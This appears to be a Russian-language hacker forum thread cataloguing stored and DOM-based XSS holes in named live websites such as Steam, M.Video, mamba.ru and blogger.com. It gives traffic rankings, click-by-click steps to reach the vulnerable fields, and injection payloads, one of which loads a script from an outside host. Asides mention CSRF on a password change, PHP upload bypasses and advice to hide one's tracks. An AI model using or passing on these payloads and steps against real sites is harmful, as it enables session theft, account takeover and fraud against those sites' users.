http://steamcommunity.com XSS в событиях группы. Уязвимое поле "Название события:" Code: "><script>alert(/XSS/)</script>
zzima.com | Active xss Тиц: 475; Пр: 4; При создании группы(http://www.zzima.com/createGroup) Отсутствует фильтрация в поле "Веб сайт". + Там есть функция - пригласить в группу.
tiu.ru tiu.ru тиц 5600 траф 40 000~ 1) Заходим на сайт 2) сверху жмякаем "Добавить компанию" 3) Уязвимое поле "Название компании" а вообще все поля уязвимы, только надо шифроваться
Russia.ru Активная xss в теле письма на russia.ru Сайт Почта В теле письма отправляем код PHP: <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Активная XSS на qchat.su Уязвимое поле Тема билета Code: "><script>alert(/XSS/)</script> Сайт снова открыт, на главной странице сообщение о взломе аккаунтов и переводе с них денег. Уязвимость закрыта. Ищу другую
берлога.net - развлекательный сайт, торрент-трекер pr: 3 тиц: 250 статистика согласно бигмирнет хостов Сегодня 62 803 хостов Вчера 143 702 уязвимое поле, в анкете «музыкальные предпочтения» также на сайте csrf на смену пароля, и множество пасивок, обход лимита на добавление релизов, заливка файлов php вместо картинок (загрузка через флешплеер, и фильтрация расширений только при выборе, то есть на js) только вот не выполняются они, а скачиваются в оригинале, но может кто найдёт lfi
molnet.ru - статьи по жизненным ситуациям в Москве тИЦ - 900 Уязвимый код: <script>alert('XSS')</script> 1) Регистрируемся 2) Заходим в свой профиль 3) Добавляем комментарий с уязвимым кодом и обновляем страницу
М.Видео – бытовая техника и электроника по доступным ценам. Удобный интернет-магазин. тИЦ - 2200 Добавляем уязвимый код: Code: http://www.mvideo.ru/homeshop/?p=cart&step=0&_recount=0&droppayment=1&delivery_type_20024096=1&ids%5B20024096%5D=1&cert_cb%5B20024096%5D=0&city_zones_id=0&promo_code_value="><script>alert('xss')</script>&promo_code=1 Переходим сюда: Code: http://www.mvideo.ru/homeshop/?p=cart + XSS из-за недостаточной фильтрации в Cookie Уязвимое место: Code: phorum_name:"><script>alert('xss')</script>; Переходим в любую тему на форуме М.Видео и XSS выполняется. Скриншот: + Еще одна активка 1) Регистрируемся в системе 2) Заходим в свой профиль 3) Добавляем адрес доставки Уязвимые поля: Корпус (cтроение), Подъезд, Телефон 2, Факс Уязвимый код: Code: "><script>alert('xss')</script> Скриншот:
Serva4ok - игровой хостинг. тИЦ - 100 1) Регистрируемся на сайте 2) Создаем свою команду После создания команды, переходим в Наш состав => [подробный список] Редактировать игрока => id[ваш_id] => Выполнить Уязвимое поле: Отзыв капитана команды Уязвимый код: Code: <script>alert('xss')</script> Пример: Code: http://www.serva4ok.ru/index.php?do=profiler&act=fight_logs&file_id=82546
Olike - Бесплатные сердечки ВКонтакте (популярен среди любителей "лайков"). Уязвимый код: Code: "><script>alert(/xss/)</script> Жмякаем на "Использовать Лайки" В поле "Название страницы" пишем наш уязвимый код. После чего переходим в "Мои Заказы" и наша XSS выполняется.
Drive2.ru - все автомобили мира: отзывы, фото, видео, блоги. тИЦ - 1100 Уязвимый код: Code: <script>alert('xss')</script> 1) Проходим авторизацию на сайте 2) Жмякаем "Написать" => "в мой блог" 3) Добавляем уязвимый код в поле "Ключевые слова (метки)"
Wellpay - система приятных электронных платежей. Тип: DOM-based Уязвимый код: Code: <script>alert('xss')</script> 1) Переходим в раздел "Мои кошельки". 2) Меняем название нашего кошелька на уязвимый код.
Спрашивай.ру - популярный ресурс у девочек вконтакте и их поклонников(так же и адекватный народ сидит, но зачем?) url: http://sprashivai.ru тИц: 275 Pr: 4 Уязвимое поле записи своих "мыслей". Фильтруются теги при постинге, но c помощью Code: " [COLOR=red]autofocus/onfocus="alert(123)"[/COLOR] для тега input можем выполнить произвольный js код. Предотвращая вопросы в ЛС -
Доменная зона Vip-file.Нашел 25.11.2009, еще жива Code: http://sms4file.com/ftp/autor.php Логин: "><script>alert(/t3cHn0iD/)</script> Пароль: "><script>alert(/t3cHn0iD/)</script>
http://www.metalinfo.ru/ комментарии к новостям алерты проходят по имени и тексту сообщения <script>alert()</script>
XSS mamba.ru Яндекс тИЦ 3 100 Пр 6 Понравилась сама реализация У мамбы есть ифрейм приложение для контакта. Так вот, при аплоаде фотки с альбома(ВКОНТАКТЕ) возможен выбор альбома(из существующих у пользователя) Называем альбом <script>alert(тэкст)</script> Заходим, обновляемся и вуаля... При том, что на самом сайте дико фильтруют все что можно Практической реализации почти нет. только если для соц инжа. Предупредил разрабочтиков. Не знают ребята, что такое имидж.
blogger.com XSS DOM-BASED Дефолтный шаблон. Создаём новость -> добавляем алерт -> сохраняем -> выбираем вид: "Timeslide" или "Magazine" -> Profit!